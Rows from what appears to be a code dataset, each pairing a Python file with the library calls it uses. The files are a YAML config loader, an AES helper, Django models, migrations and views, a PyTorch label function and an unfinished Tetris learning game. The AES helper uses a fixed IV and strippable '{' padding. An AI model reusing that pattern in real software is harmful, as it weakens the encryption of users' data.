| code | apis | extract_api |
|---|---|---|
# -*- coding:utf8 -*-
"""Read configuration file information."""
import os
import yaml

BASEPATH = os.path.dirname(__file__)


def dbConfig():
    data = open(os.path.join(BASEPATH, 'db.default.yaml'), 'r')
    # Pass an explicit Loader: a bare yaml.load() is unsafe and is a
    # warning (or TypeError) on recent PyYAML versions.
    config = yaml.load(data, Loader=yaml.SafeLoader)
    data.close()
    return config


if __name__ == '__main__':
    print(dbConfig())
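# --- Illustrative note (not part of the original) ---
# dbConfig() expects a db.default.yaml next to this file; the keys below are
# hypothetical, just to show the shape of what yaml.load would return:
#   # db.default.yaml
#   # host: localhost
#   # port: 3306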
|
[
"os.path.dirname",
"yaml.load",
"os.path.join"
] |
[((71, 96), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (86, 96), False, 'import os\n'), ((190, 205), 'yaml.load', 'yaml.load', (['data'], {}), '(data)\n', (199, 205), False, 'import yaml\n'), ((131, 172), 'os.path.join', 'os.path.join', (['BASEPATH', '"""db.default.yaml"""'], {}), "(BASEPATH, 'db.default.yaml')\n", (143, 172), False, 'import os\n')]
|
'''
Created on Jan 3, 2014

@author: <NAME>
'''
from Crypto.Cipher import AES
import base64

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
BLOCK_SZ = 14

# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'

# key and IV; both must be set before Encode/Decode are called
SECRET = None
IV = None

# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)


def Encode(s):
    cipher = AES.new(key=SECRET, mode=AES.MODE_CBC, IV=IV)
    return EncodeAES(cipher, s)


def Decode(s):
    cipher = AES.new(key=SECRET, mode=AES.MODE_CBC, IV=IV)
    return DecodeAES(cipher, s)
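# --- Illustrative usage (not part of the original module) ---
# A minimal sketch, assuming SECRET and IV are filled in with random bytes;
# the values below are examples only. Note that CBC mode expects a 16-byte IV.
#
#   import os
#   SECRET = os.urandom(32)
#   IV = os.urandom(16)
#   token = Encode('attack at dawn')
#   assert Decode(token) == 'attack at dawn'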
|
[
"Crypto.Cipher.AES.new",
"base64.b64decode"
] |
[((838, 883), 'Crypto.Cipher.AES.new', 'AES.new', ([], {'key': 'SECRET', 'mode': 'AES.MODE_CBC', 'IV': 'IV'}), '(key=SECRET, mode=AES.MODE_CBC, IV=IV)\n', (845, 883), False, 'from Crypto.Cipher import AES\n'), ((941, 986), 'Crypto.Cipher.AES.new', 'AES.new', ([], {'key': 'SECRET', 'mode': 'AES.MODE_CBC', 'IV': 'IV'}), '(key=SECRET, mode=AES.MODE_CBC, IV=IV)\n', (948, 986), False, 'from Crypto.Cipher import AES\n'), ((774, 793), 'base64.b64decode', 'base64.b64decode', (['e'], {}), '(e)\n', (790, 793), False, 'import base64\n')]
|
# coding:utf-8
from django.db import models
from django.utils import timezone
from djangocms_text_ckeditor.fields import HTMLField


class News(models.Model):
    creation_datetime = models.DateTimeField(default=timezone.now, verbose_name=u'Date de création')
    update_datetime = models.DateTimeField(default=timezone.now, verbose_name=u'Date de mise à jour')
    publication_datetime = models.DateTimeField(default=timezone.now, verbose_name=u'Date de publication')
    title = models.CharField(max_length=255, verbose_name=u'Titre')
    subtitle = models.CharField(blank=True, max_length=255, verbose_name=u'Sous-titre')
    theme = models.CharField(max_length=100, verbose_name=u'Thème')
    body = HTMLField(verbose_name=u'Contenu')
    image = models.ImageField(upload_to='news_news', verbose_name=u'Image')
    link1 = models.URLField(blank=True, verbose_name=u'Lien 1')
    link2 = models.URLField(blank=True, verbose_name=u'Lien 2')
    link3 = models.URLField(blank=True, verbose_name=u'Lien 3')

    class Meta:
        verbose_name = u'Actualité'
        verbose_name_plural = u'Actualités'
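# --- Illustrative usage (not part of the original app) ---
# A hypothetical query helper, just to show the model in use:
#
#   def latest_news(limit=5):
#       return (News.objects.filter(publication_datetime__lte=timezone.now())
#               .order_by('-publication_datetime')[:limit])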
|
[
"djangocms_text_ckeditor.fields.HTMLField",
"django.db.models.URLField",
"django.db.models.CharField",
"django.db.models.ImageField",
"django.db.models.DateTimeField"
] |
[((183, 259), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now', 'verbose_name': 'u"""Date de création"""'}), "(default=timezone.now, verbose_name=u'Date de création')\n", (203, 259), False, 'from django.db import models\n'), ((282, 361), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now', 'verbose_name': 'u"""Date de mise à jour"""'}), "(default=timezone.now, verbose_name=u'Date de mise à jour')\n", (302, 361), False, 'from django.db import models\n'), ((389, 468), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now', 'verbose_name': 'u"""Date de publication"""'}), "(default=timezone.now, verbose_name=u'Date de publication')\n", (409, 468), False, 'from django.db import models\n'), ((486, 541), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'verbose_name': 'u"""Titre"""'}), "(max_length=255, verbose_name=u'Titre')\n", (502, 541), False, 'from django.db import models\n'), ((557, 629), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(255)', 'verbose_name': 'u"""Sous-titre"""'}), "(blank=True, max_length=255, verbose_name=u'Sous-titre')\n", (573, 629), False, 'from django.db import models\n'), ((642, 697), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'verbose_name': 'u"""Thème"""'}), "(max_length=100, verbose_name=u'Thème')\n", (658, 697), False, 'from django.db import models\n'), ((709, 743), 'djangocms_text_ckeditor.fields.HTMLField', 'HTMLField', ([], {'verbose_name': 'u"""Contenu"""'}), "(verbose_name=u'Contenu')\n", (718, 743), False, 'from djangocms_text_ckeditor.fields import HTMLField\n'), ((756, 819), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""news_news"""', 'verbose_name': 'u"""Image"""'}), "(upload_to='news_news', verbose_name=u'Image')\n", (773, 819), False, 'from django.db import models\n'), ((837, 888), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'verbose_name': 'u"""Lien 1"""'}), "(blank=True, verbose_name=u'Lien 1')\n", (852, 888), False, 'from django.db import models\n'), ((901, 952), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'verbose_name': 'u"""Lien 2"""'}), "(blank=True, verbose_name=u'Lien 2')\n", (916, 952), False, 'from django.db import models\n'), ((965, 1016), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'verbose_name': 'u"""Lien 3"""'}), "(blank=True, verbose_name=u'Lien 3')\n", (980, 1016), False, 'from django.db import models\n')]
|
import torch
import torch.nn as nn


def label_broadcast(label_map, target):
    # label_map is the prediction output through softmax operation
    N, C, W, H = label_map.shape
    # label_map = label_map.softmax(dim=1)
    new_label = label_map.clone()
    # valid pixels: everything except the ignore label 255
    mask = (target.unsqueeze(1) != 255).detach()
    new_mask = torch.zeros((N, 1, W, H)).cuda()
    # gather each pixel's four masked neighbours
    left = label_map[:, :, 0:W - 1, :] * mask[:, :, 0:W - 1, :]
    right = label_map[:, :, 1:W, :] * mask[:, :, 1:W, :]
    up = label_map[:, :, :, 0:H - 1] * mask[:, :, :, 0:H - 1]
    down = label_map[:, :, :, 1:H] * mask[:, :, :, 1:H]
    # broadcast each prediction onto its neighbours, then renormalize
    new_label[:, :, 1:W, :] = new_label[:, :, 1:W, :].clone() + left
    new_label[:, :, 0:W - 1] = new_label[:, :, 0:W - 1].clone() + right
    new_label[:, :, :, 1:H] = new_label[:, :, :, 1:H].clone() + down
    new_label[:, :, :, 0:H - 1] = new_label[:, :, :, 0:H - 1].clone() + up
    new_label = nn.Softmax(dim=1)(new_label)
    # a pixel is kept if at least one of its neighbours was valid
    new_mask[:, :, 1:W, :] += mask[:, :, 0:W - 1, :]
    new_mask[:, :, 0:W - 1] += mask[:, :, 1:W, :]
    new_mask[:, :, :, 1:H] += mask[:, :, :, 0:H - 1]
    new_mask[:, :, :, 0:H - 1] += mask[:, :, :, 1:H]
    new_mask = new_mask >= 1
    return new_label, new_mask.squeeze().detach()
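# --- Illustrative usage (not part of the original) ---
# A smoke test with made-up shapes; the function calls .cuda(), so it
# assumes a CUDA device is available.
#
#   logits = torch.rand(2, 19, 64, 64).cuda().softmax(dim=1)
#   target = torch.randint(0, 19, (2, 64, 64)).cuda()
#   soft_label, valid = label_broadcast(logits, target)
#   assert soft_label.shape == (2, 19, 64, 64) and valid.shape == (2, 64, 64)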
|
[
"torch.zeros",
"torch.nn.Softmax"
] |
[((909, 926), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (919, 926), True, 'import torch.nn as nn\n'), ((327, 352), 'torch.zeros', 'torch.zeros', (['(N, 1, W, H)'], {}), '((N, 1, W, H))\n', (338, 352), False, 'import torch\n')]
|
# Generated by Django 2.2.3 on 2019-07-22 13:33
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Student',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=128, verbose_name='name')),
                ('sex', models.IntegerField(choices=[(1, 'male'), (2, 'female'), (0, 'unknown')], verbose_name='sex')),
                ('profession', models.CharField(max_length=128, verbose_name='job')),
                ('email', models.EmailField(max_length=254, verbose_name='Email')),
                ('qq', models.CharField(max_length=128, verbose_name='qq')),
                ('phone', models.CharField(max_length=128, verbose_name='phone')),
                ('status', models.IntegerField(choices=[(0, 'applying'), (1, 'passed'), (2, 'refused')], default=0, verbose_name='checkStatus')),
                ('created_time', models.DateTimeField(auto_now_add=True, verbose_name='createTime')),
            ],
            options={
                'verbose_name': 'StudentInf',
                'verbose_name_plural': 'StudentInf',
            },
        ),
    ]
|
[
"django.db.models.CharField",
"django.db.models.EmailField",
"django.db.models.AutoField",
"django.db.models.IntegerField",
"django.db.models.DateTimeField"
] |
[((303, 396), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (319, 396), False, 'from django.db import migrations, models\n'), ((420, 473), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'verbose_name': '"""name"""'}), "(max_length=128, verbose_name='name')\n", (436, 473), False, 'from django.db import migrations, models\n'), ((500, 597), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'choices': "[(1, 'male'), (2, 'female'), (0, 'unknown')]", 'verbose_name': '"""sex"""'}), "(choices=[(1, 'male'), (2, 'female'), (0, 'unknown')],\n verbose_name='sex')\n", (519, 597), False, 'from django.db import migrations, models\n'), ((627, 679), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'verbose_name': '"""job"""'}), "(max_length=128, verbose_name='job')\n", (643, 679), False, 'from django.db import migrations, models\n'), ((708, 763), 'django.db.models.EmailField', 'models.EmailField', ([], {'max_length': '(254)', 'verbose_name': '"""Email"""'}), "(max_length=254, verbose_name='Email')\n", (725, 763), False, 'from django.db import migrations, models\n'), ((789, 840), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'verbose_name': '"""qq"""'}), "(max_length=128, verbose_name='qq')\n", (805, 840), False, 'from django.db import migrations, models\n'), ((869, 923), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'verbose_name': '"""phone"""'}), "(max_length=128, verbose_name='phone')\n", (885, 923), False, 'from django.db import migrations, models\n'), ((953, 1074), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'choices': "[(0, 'applying'), (1, 'passed'), (2, 'refused')]", 'default': '(0)', 'verbose_name': '"""checkStatus"""'}), "(choices=[(0, 'applying'), (1, 'passed'), (2, 'refused')\n ], default=0, verbose_name='checkStatus')\n", (972, 1074), False, 'from django.db import migrations, models\n'), ((1105, 1171), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""createTime"""'}), "(auto_now_add=True, verbose_name='createTime')\n", (1125, 1171), False, 'from django.db import migrations, models\n')]
|
from django.shortcuts import redirect, render, get_object_or_404
from .forms import ProfileForm, Hoodform, BusinessForm, PostForm
from django.contrib.auth.decorators import login_required
from .models import Hood, Profile, Business, Post
from urllib import request
from django.db.models import Q

# Create your views here.


@login_required(login_url='/accounts/login/')
def home(request):
    current_user = request.user
    # print(current_user)
    if request.method == 'POST':
        formhood = Hoodform(request.POST, request.FILES)
        if formhood.is_valid():
            upload = formhood.save(commit=False)
            upload.admin = request.user.profile
            # request.user.profile.save()
            upload.save()
            return redirect('home')
    else:
        formhood = Hoodform()
    welcome = "welcome to the home page"
    hoods = Hood.objects.all()
    return render(request, 'hood/home.html', {"welcome": welcome, "formhood": formhood, "hoods": hoods})


@login_required(login_url='/accounts/login/')
def add_profile(request):
    current_user = request.user
    if request.method == 'POST':
        formpro = ProfileForm(request.POST, request.FILES)
        if formpro.is_valid():
            upload = formpro.save(commit=False)
            upload.user = current_user
            upload.save()
            return redirect('profile')
    else:
        formpro = ProfileForm()
    return render(request, 'hood/add_profile.html', {"formpro": formpro})


@login_required(login_url='/accounts/login/')
def profile(request):
    return render(request, 'hood/profile.html')


@login_required(login_url='/accounts/login/')
def neighborhood(request, hood_id):
    current_user = request.user
    # hood = get_object_or_404(Hood, pk=hood_id)
    if request.method == 'POST':
        formbiz = BusinessForm(request.POST, request.FILES)
        if formbiz.is_valid():
            addbiz = formbiz.save(commit=False)
            addbiz.hood = hood_id
            # upload.admin = current_user
            # request.user.profile.save()
            addbiz.save()
            return redirect('hood')
    else:
        formbiz = BusinessForm()
    if request.method == 'POST':
        formpost = PostForm(request.POST, request.FILES)
        if formpost.is_valid():
            addpost = formpost.save(commit=False)
            addpost.hoodwatch = hood_id
            addpost.user = current_user
            addpost.save()
            return redirect('hood')
    else:
        formpost = PostForm()
    # post = get_object_or_404(Post, hoodwatch=hood_id)
    hood = get_object_or_404(Hood, pk=hood_id)
    # business = get_object_or_404(Business, hood=hood_id)
    return render(request, 'hood/hood.html', {"formbiz": formbiz, "formpost": formpost, "hood": hood})


@login_required(login_url='/accounts/login/')
def search(request):
    query = request.GET.get('q')
    print(query)
    if query:
        results = Hood.objects.filter(
            Q(name__icontains=query))
    else:
        results = Hood.objects.all()
    return render(request, 'pages/search.html', {'results': results})
|
[
"django.contrib.auth.decorators.login_required",
"urllib.request.GET.get",
"django.shortcuts.redirect",
"django.db.models.Q",
"django.shortcuts.get_object_or_404",
"django.shortcuts.render"
] |
[((326, 370), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/accounts/login/"""'}), "(login_url='/accounts/login/')\n", (340, 370), False, 'from django.contrib.auth.decorators import login_required\n'), ((993, 1037), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/accounts/login/"""'}), "(login_url='/accounts/login/')\n", (1007, 1037), False, 'from django.contrib.auth.decorators import login_required\n'), ((1492, 1536), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/accounts/login/"""'}), "(login_url='/accounts/login/')\n", (1506, 1536), False, 'from django.contrib.auth.decorators import login_required\n'), ((1611, 1655), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/accounts/login/"""'}), "(login_url='/accounts/login/')\n", (1625, 1655), False, 'from django.contrib.auth.decorators import login_required\n'), ((2808, 2852), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/accounts/login/"""'}), "(login_url='/accounts/login/')\n", (2822, 2852), False, 'from django.contrib.auth.decorators import login_required\n'), ((896, 993), 'django.shortcuts.render', 'render', (['request', '"""hood/home.html"""', "{'welcome': welcome, 'formhood': formhood, 'hoods': hoods}"], {}), "(request, 'hood/home.html', {'welcome': welcome, 'formhood': formhood,\n 'hoods': hoods})\n", (902, 993), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((1426, 1488), 'django.shortcuts.render', 'render', (['request', '"""hood/add_profile.html"""', "{'formpro': formpro}"], {}), "(request, 'hood/add_profile.html', {'formpro': formpro})\n", (1432, 1488), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((1571, 1607), 'django.shortcuts.render', 'render', (['request', '"""hood/profile.html"""'], {}), "(request, 'hood/profile.html')\n", (1577, 1607), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2713, 2808), 'django.shortcuts.render', 'render', (['request', '"""hood/hood.html"""', "{'formbiz': formbiz, 'formpost': formpost, 'hood': hood}"], {}), "(request, 'hood/hood.html', {'formbiz': formbiz, 'formpost': formpost,\n 'hood': hood})\n", (2719, 2808), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2887, 2907), 'urllib.request.GET.get', 'request.GET.get', (['"""q"""'], {}), "('q')\n", (2902, 2907), False, 'from urllib import request\n'), ((3074, 3132), 'django.shortcuts.render', 'render', (['request', '"""pages/search.html"""', "{'results': results}"], {}), "(request, 'pages/search.html', {'results': results})\n", (3080, 3132), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2603, 2638), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Hood'], {'pk': 'hood_id'}), '(Hood, pk=hood_id)\n', (2620, 2638), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((754, 770), 'django.shortcuts.redirect', 'redirect', (['"""home"""'], {}), "('home')\n", (762, 770), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((1352, 1371), 'django.shortcuts.redirect', 'redirect', (['"""profile"""'], {}), "('profile')\n", (1360, 1371), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2109, 2125), 'django.shortcuts.redirect', 'redirect', (['"""hood"""'], {}), "('hood')\n", (2117, 2125), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2469, 2485), 'django.shortcuts.redirect', 'redirect', (['"""hood"""'], {}), "('hood')\n", (2477, 2485), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2990, 3014), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'query'}), '(name__icontains=query)\n', (2991, 3014), False, 'from django.db.models import Q\n')]
|
import pygame as pg
import random, time, sys
import copy, numpy, pyautogui, math

# Define settings and constants
pyautogui.PAUSE = 0.03
pyautogui.FAILSAFE = True

# Game window width and height
WINDOWWIDTH = 800
WINDOWHEIGHT = 640
# Box size and the width/height of a piece template, in boxes
BOXSIZE = 30
BOXWIDTH = 5
BOXHEIGHT = 5
# Board width and height, in boxes
BOARDWIDTH = 10
BOARDHEIGHT = 20
BLANK = '0'  # empty cell
XMARGIN = int((WINDOWWIDTH - BOARDWIDTH * BOXSIZE) / 2)
YMARGIN = WINDOWHEIGHT - (BOARDHEIGHT * BOXSIZE) - 5

WHITE = (255, 255, 255)  # text font color
BLACK = (0, 0, 0)  # background color
GRAY = (177, 177, 177)  # color of the grid lines on the board
# Piece colors
RED = (155, 0, 0)
GREEN = (0, 155, 0)
BLUE = (0, 0, 155)
YELLOW = (155, 155, 0)
# Lighter shades used to give the pieces a gradient effect
LIGHTRED = (175, 20, 20)
LIGHTGREEN = (20, 175, 20)
LIGHTBLUE = (20, 20, 175)
LIGHTYELLOW = (175, 175, 20)
# Board and text colors
BORDERCOLOR = BLUE
BGCOLOR = BLACK
TEXTCOLOR = WHITE
TEXTSHADOWCOLOR = GRAY
# Random piece colors are picked from these color tuples
COLORS = (BLUE, GREEN, RED, YELLOW)
LIGHTCOLORS = (LIGHTBLUE, LIGHTGREEN, LIGHTRED, LIGHTYELLOW)

# Piece shapes
S_SHAPE_TEMPLATE = [['00000', '00000', '00110', '01100', '00000'],
                    ['00000', '00100', '00110', '00010', '00000']]
Z_SHAPE_TEMPLATE = [['00000', '00000', '01100', '00110', '00000'],
                    ['00000', '00100', '01100', '01000', '00000']]
I_SHAPE_TEMPLATE = [['00100', '00100', '00100', '00100', '00000'],
                    ['00000', '00000', '11110', '00000', '00000']]
O_SHAPE_TEMPLATE = [['00000', '00000', '01100', '01100', '00000']]
J_SHAPE_TEMPLATE = [['00000', '01000', '01110', '00000', '00000'],
                    ['00000', '00110', '00100', '00100', '00000'],
                    ['00000', '00000', '01110', '00010', '00000'],
                    ['00000', '00100', '00100', '01100', '00000']]
L_SHAPE_TEMPLATE = [['00000', '00010', '01110', '00000', '00000'],
                    ['00000', '00100', '00100', '00110', '00000'],
                    ['00000', '00000', '01110', '01000', '00000'],
                    ['00000', '01100', '00100', '00100', '00000']]
T_SHAPE_TEMPLATE = [['00000', '00100', '01110', '00000', '00000'],
                    ['00000', '00100', '00110', '00100', '00000'],
                    ['00000', '00000', '01110', '00100', '00000'],
                    ['00000', '00100', '01100', '00100', '00000']]
PIECES = {
    'S': S_SHAPE_TEMPLATE,
    'Z': Z_SHAPE_TEMPLATE,
    'J': J_SHAPE_TEMPLATE,
    'L': L_SHAPE_TEMPLATE,
    'I': I_SHAPE_TEMPLATE,
    'O': O_SHAPE_TEMPLATE,
    'T': T_SHAPE_TEMPLATE
}

# Define learning parameters
alpha = 0.01
gamma = 0.9
MAX_GAMES = 20
explore_change = 0.5
weights = [-1, -1, -1, -30]  # Initial weight vector
def Run_game(weights, explore_change):
    board = get_blank_board()  # create the board
    score = 0  # reset the score
    level, fall_freq = get_level_and_fall_freq(score)  # initial level and fall speed
    current_move = [0, 0]  # the piece's optimal move
    falling_piece = get_new_piece()  # take a falling piece
    next_piece = get_new_piece()  # and make the next piece
    last_fall_time = time.time()  # the piece falls once per interval
    while True:
        if falling_piece is None:
            # no falling piece, so take the next piece
            falling_piece = next_piece
            next_piece = get_new_piece()
            last_fall_time = time.time()  # reset last_fall_time
            if not is_valid_position(board, falling_piece):  # the new piece overlaps the stack
                # can't fit a new piece on the board, so game over
                return score, weights, explore_change  # return the score and learning state at game over
        current_move, weights = gradient_descent(board, falling_piece, weights,
                                                 explore_change)
        if explore_change > 0.001:
            explore_change = explore_change * 0.99
        else:
            explore_change = 0
        current_move = make_move(current_move)
        for event in pg.event.get():  # event handling loop
            if event.type == pg.QUIT:
                check = False
                sys.exit()
            if event.type == pg.KEYDOWN:
                if (event.key == pg.K_LEFT or event.key == pg.K_a) and is_valid_position(
                        board, falling_piece, adj_x=-1):  # left arrow key
                    falling_piece['x'] -= 1
                elif (event.key == pg.K_RIGHT or event.key == pg.K_d) and is_valid_position(
                        board, falling_piece, adj_x=1):  # right arrow key
                    falling_piece['x'] += 1
                elif (event.key == pg.K_UP or event.key == pg.K_w):  # up arrow key: rotate
                    falling_piece['rotation'] = (falling_piece['rotation'] + 1) % len(PIECES[falling_piece['shape']])
                    if not is_valid_position(board, falling_piece):
                        falling_piece['rotation'] = (falling_piece['rotation'] - 1) % len(PIECES[falling_piece['shape']])
                elif (event.key == pg.K_DOWN or event.key == pg.K_s):  # down arrow key
                    if is_valid_position(board, falling_piece, adj_y=1):
                        falling_piece['y'] += 1
                elif event.key == pg.K_SPACE:  # space key: hard drop
                    for i in range(1, BOARDHEIGHT):
                        if not is_valid_position(board, falling_piece, adj_y=i):
                            break
                    falling_piece['y'] += i - 1
        if time.time() - last_fall_time > fall_freq:  # the piece is due to fall one step
            if not is_valid_position(board, falling_piece, adj_y=1):
                add_to_board(board, falling_piece)  # lock the piece into the board
                lines, board = remove_complete_lines(board)  # number of cleared lines
                score += lines * lines  # increase the score
                level, fall_freq = get_level_and_fall_freq(score)  # adjust level and fall speed
                falling_piece = None  # there is no falling piece now
            else:
                # move the piece down one row so it falls once per interval
                falling_piece['y'] += 1
                last_fall_time = time.time()
        GAME.fill(BGCOLOR)
        draw_board(board)
        draw_status(score, level, current_move, games_completed)
        draw_next_piece(next_piece)
        if falling_piece is not None:
            draw_piece(falling_piece)
        pg.display.update()
        FPS.tick(30)  # run the game at 30 frames per second
def make_text_objs(text, font, color):
    surf = font.render(text, True, color)  # render the font
    return surf, surf.get_rect()


def show_text_screen(text):  # print the given text on the screen
    title_surf, title_rect = make_text_objs(text, SubFont, TEXTSHADOWCOLOR)
    title_rect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2))
    GAME.blit(title_surf, title_rect)
    title_surf, title_rect = make_text_objs(text, SubFont, TEXTCOLOR)
    title_rect.center = (int(WINDOWWIDTH / 2) - 3, int(WINDOWHEIGHT / 2) - 3)
    GAME.blit(title_surf, title_rect)
    press_key_surf, press_key_rect = make_text_objs('Please wait to continue.',
                                                    SubFont, TEXTCOLOR)
    press_key_rect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2) + 100)
    GAME.blit(press_key_surf, press_key_rect)
    pg.display.update()
    FPS.tick()
    time.sleep(0.5)


def get_level_and_fall_freq(score):
    level = int(score / 3)  # the level rises every 3 points
    if level < 6:  # the fall interval shrinks until level 6
        fallsp = 0.6 - (level * 0.1) + 0.1
    else:  # from level 6 on, the speed stays constant
        fallsp = 0.2
    return level, fallsp  # return the level and fall interval


def get_new_piece():
    # pick a new piece at random
    shape = random.choice(list(PIECES.keys()))
    new_piece = {
        'shape': shape,
        'rotation': random.randint(0,
                                    len(PIECES[shape]) - 1),
        'x': int(BOARDWIDTH / 2) - int(BOXWIDTH / 2),
        'y': -2,  # start it above the board (i.e. less than 0)
        'color': random.randint(1,
                                 len(COLORS) - 1)
    }
    return new_piece
def add_to_board(board, piece):
    for x in range(BOXWIDTH):
        for y in range(BOXHEIGHT):
            if PIECES[piece['shape']][piece['rotation']][y][x] != BLANK and x + piece['x'] < 10 and y + piece['y'] < 20:
                # the template cell is filled and lands inside the board
                board[x + piece['x']][y + piece['y']] = piece['color']  # fill that board cell with the piece's color


def get_blank_board():
    # create a board array of the preset width and height
    board = []
    for _ in range(BOARDWIDTH):
        board.append(['0'] * BOARDHEIGHT)
    return board


def is_on_board(x, y):
    return x >= 0 and x < BOARDWIDTH and y < BOARDHEIGHT  # True if the cell is on the board


def is_valid_position(board, piece, adj_x=0, adj_y=0):
    for x in range(BOXWIDTH):
        for y in range(BOXHEIGHT):
            is_above_board = y + piece['y'] + adj_y < 0
            if is_above_board or PIECES[piece['shape']][piece['rotation']][y][x] == BLANK:
                continue  # empty template cells need no check
            if not is_on_board(x + piece['x'] + adj_x, y + piece['y'] + adj_y):
                return False  # the piece would leave the board
            if board[x + piece['x'] + adj_x][y + piece['y'] + adj_y] != BLANK:
                return False  # the target cell is already occupied
    return True


def is_complete_line(board, y):
    for x in range(BOARDWIDTH):
        if board[x][y] == BLANK:  # the line still has an empty cell
            return False
    return True  # otherwise the line is complete


def remove_complete_lines(board):
    lines_removed = 0
    y = BOARDHEIGHT - 1
    while y >= 0:
        if is_complete_line(board, y):
            for pull_down_y in range(y, 0, -1):
                for x in range(BOARDWIDTH):
                    board[x][pull_down_y] = board[x][pull_down_y - 1]  # pull the stack above the cleared line down
            for x in range(BOARDWIDTH):
                board[x][0] = BLANK  # the cleared row leaves a blank top row
            lines_removed += 1  # count the cleared line
        else:
            y -= 1
    return lines_removed, board
def convert_to_pixel_coords(boxx, boxy):
    # Convert the given xy coordinates of the board to xy
    # coordinates of the location on the screen.
    return (XMARGIN + (boxx * BOXSIZE)), (YMARGIN + (boxy * BOXSIZE))


def draw_box(boxx, boxy, color, pixelx=None, pixely=None):
    # render a single board cell (called for every cell on every frame)
    for i in range(BOARDWIDTH):
        pg.draw.line(GAME, GRAY, ((XMARGIN + 10) + (i * BOXSIZE - 10), YMARGIN - 3),
                     ((XMARGIN + 10) + (i * BOXSIZE - 10), YMARGIN + 600), 2)  # vertical grid lines
    for j in range(BOARDHEIGHT):
        pg.draw.line(GAME, GRAY, (XMARGIN, (YMARGIN - 3) + (j * BOXSIZE)),
                     (XMARGIN + 300, (YMARGIN - 3) + (j * BOXSIZE)), 2)  # horizontal grid lines
    if color == BLANK:
        return
    if pixelx is None and pixely is None:
        pixelx, pixely = convert_to_pixel_coords(boxx, boxy)
    pg.draw.rect(GAME, COLORS[color],
                 (pixelx + 1, pixely + 1, BOXSIZE - 1, BOXSIZE - 1))
    pg.draw.rect(GAME, LIGHTCOLORS[color],
                 (pixelx + 1, pixely + 1, BOXSIZE - 4, BOXSIZE - 4))


def draw_board(board):
    # render the coded board array on the screen
    pg.draw.rect(GAME, BORDERCOLOR,
                 (XMARGIN - 3, YMARGIN - 7, (BOARDWIDTH * BOXSIZE) + 8,
                  (BOARDHEIGHT * BOXSIZE) + 8), 5)
    # fill the background of the board
    pg.draw.rect(
        GAME, BGCOLOR,
        (XMARGIN, YMARGIN, BOXSIZE * BOARDWIDTH, BOXSIZE * BOARDHEIGHT))
    # draw the individual boxes on the board
    for x in range(BOARDWIDTH):
        for y in range(BOARDHEIGHT):
            draw_box(x, y, board[x][y])


def draw_status(score, level, best_move, games_completed):
    # render the score, level, learning progress, and next optimal move
    # draw the score text
    score_surf = SubFont.render('Score: %s' % score, True, TEXTCOLOR)
    score_rect = score_surf.get_rect()
    score_rect.topleft = (WINDOWWIDTH - 200, 20)
    GAME.blit(score_surf, score_rect)
    # draw the level text
    level_surf = SubFont.render('Level: %s' % level, True, TEXTCOLOR)
    level_rect = level_surf.get_rect()
    level_rect.topleft = (WINDOWWIDTH - 200, 50)
    GAME.blit(level_surf, level_rect)
    # draw the best_move text
    move_surf = SubFont.render('Current Move: %s' % best_move, True, TEXTCOLOR)
    move_rect = move_surf.get_rect()
